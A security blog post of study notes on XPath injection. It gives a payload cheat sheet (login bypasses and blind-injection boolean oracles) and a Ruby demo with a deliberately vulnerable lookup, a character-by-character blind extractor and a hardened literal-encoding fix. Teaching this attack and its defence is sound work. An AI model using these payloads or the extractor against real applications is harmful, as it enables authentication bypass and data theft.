Veloideu - IT∽Security∽Programming
[Study] XPath Injection
🌍WEB 2022. 9. 20. 12:14

Overview: XPath injection has recently been showing up in CTF challenges, so this post collects study notes and a cheat sheet for it.

Cheat sheet

Exploitation is similar to SQL injection: untrusted input is concatenated into an XPath query string and the attacker closes the quoted value early to change the query's logic. A typical vulnerable query looks like this (two inputs, username and password):

"string(//user[name/text()='" +vuln_var1+ "' and password/text()='" +vuln_var2+ "']/account/text())"

Payloads:

' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
s..

Notes on the payloads: in XPath, and binds tighter than or, so the x' or 1=1 or 'x'='y form makes the whole predicate true regardless of the trailing and password/text()='...' clause. The count(), name() and comment() conditions do not return data by themselves; they are boolean oracles for blind injection, where the application's yes/no response tells you whether the injected condition held.
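The following script is an added example, not code from the original post. It rebuilds the cheat sheet's vulnerable query template on Ruby's standard REXML XPath engine against a small constructed user store, shows the ' or '1'='1 and x' or 1=1 or 'x'='y payloads returning every account, turns the count()/name() style conditions into a boolean oracle that extracts the root element's name blind, and contrasts a hardened lookup that encodes the input as an XPath string literal. The user store, the function names and the helper are all assumptions made for this example.

```ruby
require 'rexml/document'

# Constructed sample user store (not data from the original post); stands in
# for the XML file an application would authenticate against.
USERS_XML = <<~XML
  <users>
    <user><name>admin</name><password>s3cr3t!</password><account>admin-acct</account></user>
    <user><name>alice</name><password>wonderland</password><account>alice-acct</account></user>
    <user><name>bob</name><password>builder</password><account>bob-acct</account></user>
  </users>
XML
DOC = REXML::Document.new(USERS_XML)

# Vulnerable lookup: same shape as the cheat sheet template, both inputs are
# spliced straight into the query string.
def lookup_account_vulnerable(doc, user, pass)
  query = "//user[name/text()='#{user}' and password/text()='#{pass}']/account/text()"
  REXML::XPath.match(doc, query).map(&:value)
end

# Encode an arbitrary string as an XPath 1.0 string literal. XPath has no
# escape character, so a value containing both quote kinds must be split
# into pieces and rejoined with concat().
def xpath_literal(s)
  return "'#{s}'" unless s.include?("'")
  return "\"#{s}\"" unless s.include?('"')
  parts = s.split("'", -1).map { |p| "'#{p}'" }
  sep = %q{, "'", }
  "concat(#{parts.join(sep)})"
end

# Hardened lookup: the input can no longer terminate the literal.
def lookup_account_safe(doc, user, pass)
  query = "//user[name/text()=#{xpath_literal(user)} and " \
          "password/text()=#{xpath_literal(pass)}]/account/text()"
  REXML::XPath.match(doc, query).map(&:value)
end

# Boolean oracle for blind injection: did the injected name make the
# (vulnerable) query return anything at all?
def oracle(doc, name_payload)
  !lookup_account_vulnerable(doc, name_payload, 'x').empty?
end

# Blind extraction of the root element name, one character at a time, using
# the "x' or <cond> or 'x'='y" form so the password clause is neutralised.
def extract_root_name(doc, alphabet: ('a'..'z').to_a, max_len: 16)
  len = (1..max_len).find do |n|
    oracle(doc, "x' or string-length(name(/*))=#{n} or 'x'='y")
  end
  raise 'root name length not found within max_len' unless len
  (1..len).map do |i|
    alphabet.find { |c| oracle(doc, "x' or substring(name(/*),#{i},1)='#{c}' or 'x'='y") }
  end.join
end

if __FILE__ == $0
  p lookup_account_vulnerable(DOC, 'admin', 's3cr3t!')
  p lookup_account_vulnerable(DOC, "' or '1'='1", "' or '1'='1")
  p lookup_account_vulnerable(DOC, "x' or 1=1 or 'x'='y", 'nope')
  p lookup_account_safe(DOC, "' or '1'='1", "' or '1'='1")
  p extract_root_name(DOC)
end
```

The literal-encoding helper is the minimal fix when the XPath engine offers no parameter binding; where the engine does support bound variables, referencing them as $user and $pass in the query is the cleaner option, for the same reason prepared statements are preferred over escaping in SQL.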